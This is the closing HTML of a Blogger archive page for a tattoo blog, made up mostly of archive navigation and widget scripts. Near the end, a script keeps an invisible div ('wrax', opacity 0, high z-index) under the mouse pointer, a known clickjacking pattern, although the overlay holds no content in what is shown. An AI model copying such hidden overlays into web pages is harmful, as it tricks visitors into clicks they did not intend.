</a>
<span class='post-count' dir='ltr'>(1)</span>
</li>
</ul>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2012/'>
2012
</a>
<span class='post-count' dir='ltr'>(65)</span>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2012/04/'>
April
</a>
<span class='post-count' dir='ltr'>(13)</span>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2012/03/'>
March
</a>
<span class='post-count' dir='ltr'>(5)</span>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2012/02/'>
February
</a>
<span class='post-count' dir='ltr'>(24)</span>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2012/01/'>
January
</a>
<span class='post-count' dir='ltr'>(23)</span>
</li>
</ul>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate expanded'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy toggle-open'>

        &#9660;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2011/'>
2011
</a>
<span class='post-count' dir='ltr'>(54)</span>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2011/12/'>
December
</a>
<span class='post-count' dir='ltr'>(3)</span>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2011/11/'>
November
</a>
<span class='post-count' dir='ltr'>(1)</span>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2011/10/'>
October
</a>
<span class='post-count' dir='ltr'>(7)</span>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate expanded'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy toggle-open'>

        &#9660;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2011/09/'>
September
</a>
<span class='post-count' dir='ltr'>(3)</span>
<ul class='posts'>
<li><a href='http://afullbodytattoos.blogspot.ca/2011/09/girl-rib-tattoos.html'>girl rib tattoos</a></li>
<li><a href='http://afullbodytattoos.blogspot.ca/2011/09/star-tattoo-wrist-ideas.html'>star tattoo wrist ideas</a></li>
<li><a href='http://afullbodytattoos.blogspot.ca/2011/09/sparrow-tattoo.html'>sparrow tattoo</a></li>
</ul>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2011/08/'>
August
</a>
<span class='post-count' dir='ltr'>(4)</span>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2011/07/'>
July
</a>
<span class='post-count' dir='ltr'>(4)</span>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2011/06/'>
June
</a>
<span class='post-count' dir='ltr'>(4)</span>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2011/05/'>
May
</a>
<span class='post-count' dir='ltr'>(6)</span>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2011/04/'>
April
</a>
<span class='post-count' dir='ltr'>(5)</span>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2011/03/'>
March
</a>
<span class='post-count' dir='ltr'>(8)</span>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2011/02/'>
February
</a>
<span class='post-count' dir='ltr'>(5)</span>
</li>
</ul>
<ul class='hierarchy'>
<li class='archivedate collapsed'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy'>

        &#9658;&#160;
      
</span>
</a>
<a class='post-count-link' href='http://afullbodytattoos.blogspot.ca/2011/01/'>
January
</a>
<span class='post-count' dir='ltr'>(4)</span>
</li>
</ul>
</li>
</ul>
</div>
</div>
<div class='clear'></div>
<span class='widget-item-control'>
<span class='item-control blog-admin'>
<a class='quickedit' href='//www.blogger.com/rearrange?blogID=5804938397082779454&widgetType=BlogArchive&widgetId=BlogArchive1&action=editWidget&sectionId=sidebar2' onclick='return _WidgetManager._PopupConfig(document.getElementById("BlogArchive1"));' target='configBlogArchive1' title='Edit'>
<img alt='' height='18' src='https://resources.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
</span>
</span>
<div class='clear'></div>
</div>
</div></div>
</div>
<!-- spacer for skins that want sidebar and main to be the same height-->
<div class='clear'>&#160;</div>
</div>
<!-- end content-wrapper -->
<div id='footer-wrapper'>
<div class='footer no-items section' id='footer'></div>
</div>
</div></div>
<!-- end outer-wrapper -->
<div id='wrax' style='position: absolute; opacity: 0; filter: alpha(opacity = 0); margin-left: -50px; z-index: 100;'>
<div class='clear'></div>
</div>
<script type='text/javascript'>
        jQuery( document ).ready( function() {
            $( "#link" ).mousemove( function( e ) {
                $( '#wrax' ).css( {
                    top: e.pageY - 17,
                    left: e.pageX - 8
                } );
            } );
        } )
    </script>
</span>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>

<script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/2403248619-widgets.js"></script>
<script type='text/javascript'>
window['__wavt'] = 'AOuZoY66ttrdpnvsRzdTcRjHjlmewWoBYw:1492315310694';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d5804938397082779454','//afullbodytattoos.blogspot.ca/2011/09/','5804938397082779454');
_WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '5804938397082779454', 'title': 'FULL BODY TATTOO', 'url': 'http://afullbodytattoos.blogspot.ca/2011/09/', 'canonicalUrl': 'http://afullbodytattoos.blogspot.com/2011/09/', 'homepageUrl': 'http://afullbodytattoos.blogspot.ca/', 'searchUrl': 'http://afullbodytattoos.blogspot.ca/search', 'canonicalHomepageUrl': 'http://afullbodytattoos.blogspot.com/', 'blogspotFaviconUrl': 'http://afullbodytattoos.blogspot.ca/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': true, 'analyticsAccountNumber': '', 'useUniversalAnalytics': false, 'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22FULL BODY TATTOO - Atom\x22 href\x3d\x22http://afullbodytattoos.blogspot.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22FULL BODY TATTOO - RSS\x22 href\x3d\x22http://afullbodytattoos.blogspot.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22FULL BODY TATTOO - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/5804938397082779454/posts/default\x22 /\x3e\n', 'meTag': '', 'openIdOpTag': '', 'mobileHeadScript': '', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/4183ba16445b5c2c', 'plusOneApiSrc': 'https://apis.google.com/js/plusone.js', 'sharing': {'platforms': [{'name': 'Get link', 'key': 'link', 'shareMessage': 'Get link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Share to Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'Twitter', 'key': 'twitter', 'shareMessage': 'Share to Twitter', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Share to Pinterest', 'target': 'pinterest'}, {'name': 'Google+', 'key': 'googlePlus', 'shareMessage': 'Share to Google+', 'target': 'googleplus'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'googlePlusShareButtonWidth': 300, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27en\x27};\x3c/script\x3e'}, 'jumpLinkMessage': 'Read more &#187;', 'pageType': 'archive', 'pageName': 'September 2011', 'pageTitle': 'FULL BODY TATTOO: September 2011'}}, {'name': 'features', 'data': {'enhancedSourcesets': 'true', 'unsupported_browser_message': 'false'}}, {'name': 'messages', 'data': {'linkCopiedToClipboard': 'Link copied to clipboard!', 'postLink': 'Post Link'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Custom', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'FULL BODY TATTOO', 'description': '', 'url': 'http://afullbodytattoos.blogspot.ca/2011/09/', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': false, 'isArchive': true, 'isLabelSearch': false, 'archive': {'year': 2011, 'month': 9, 'rangeMessage': 'Showing posts from September, 2011'}}}]);
_WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header', null, document.getElementById('Header1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_AttributionView', new _WidgetInfo('Attribution1', 'navi', null, document.getElementById('Attribution1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', null, document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/2977042004-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/368954415-lightbox_bundle.css'}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_StatsView', new _WidgetInfo('Stats1', 'main', null, document.getElementById('Stats1'), {'title': 'Total Pageviews', 'showGraphicalCounter': false, 'showAnimatedCounter': false, 'showSparkline': true, 'statsUrl': '//afullbodytattoos.blogspot.ca/b/stats?style\x3dBLACK_TRANSPARENT\x26timeRange\x3dALL_TIME\x26token\x3dev6jdlsBAAA.Jd5j_M8sj0q2d42LNCIGru87jmOSFhTUpCC4toCoDVw.5LfLXoOOycznS7S6DEalEA'}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_PopularPostsView', new _WidgetInfo('PopularPosts1', 'sidebar1', null, document.getElementById('PopularPosts1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_BlogArchiveView', new _WidgetInfo('BlogArchive1', 'sidebar2', null, document.getElementById('BlogArchive1'), {'languageDirection': 'ltr', 'loadingMessage': 'Loading\x26hellip;'}, 'displayModeFull'));
</script>
</body>
</html>